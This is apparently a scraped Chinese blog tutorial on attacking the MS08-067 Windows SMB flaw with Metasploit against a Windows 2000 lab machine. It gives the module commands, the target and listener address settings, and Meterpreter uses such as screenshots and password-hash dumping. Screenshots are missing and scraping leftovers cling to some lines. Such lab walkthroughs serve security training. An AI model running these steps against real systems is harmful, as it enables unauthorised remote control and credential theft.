使用Metaspoit攻擊MS08-067

kali視頻學習請看

http://www.cnblogs.com/lidong20179210/p/8909569.htmlhtml

使用Metaspoit攻擊MS08-067

MS08-067漏洞的全稱爲「Windows Server服務RPC請求緩衝區溢出漏洞」,若是用戶在受影響的系統上收到特製的 RPC 請求,則該漏洞可能容許遠程執行代碼。sql

在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證便可利用此漏洞運行任意代碼,此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。防火牆最佳作法和標準的默認防火牆配置,有助於保護網絡資源免受從企業外部發起的攻擊,默認狀況下能創建空鏈接。
此實驗使用的攻擊機是kali,靶機是Win2kServershell

一、查看攻擊機ip地址

靶機ip

二、在Kali中使用metasploit,首先啓動PostgreSQL數據庫服務和metasploit服務

service postgresql start//啓動數據庫
service metasploit start//啓動metasploit數據庫

三、備註因爲高版本kali中已經沒有metasploit,因此可使用以下命令鏈接數據庫服務


查找是否存在ms08-067漏洞,看到返回相應信息

4.輸入使用該漏洞攻擊程序:命令:use exploit/windows/smb/ms08_067_netapi;執行結束後以下:

5.設置靶機和攻擊機的地址

set RHOST 192.168.11.40
set LHOST 192.168.11.35windows

6.接下來就是實施攻擊了,執行命令exploit

附上對meterpreter的介紹:http://www.xuebuyuan.com/1993953.html
meterpretershell做爲滲透模塊有不少有用的功能,好比添加一個用戶、隱藏一些東西、打開shell、獲得用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、獲得遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。api

七、利用meterpretershell做爲滲透模塊的實例

7.一、得到目標系統的屏幕截圖:

它把截圖放在你kali的root路徑下了
網絡

一樣的還能夠利用命令ps獲取系統當前的進程列表、pwd獲取當前的工做目錄和用戶ID、hashdump獲取目標系統的password hash(密碼哈希)等,在着不在贅述。post

相關文章
相關標籤/搜索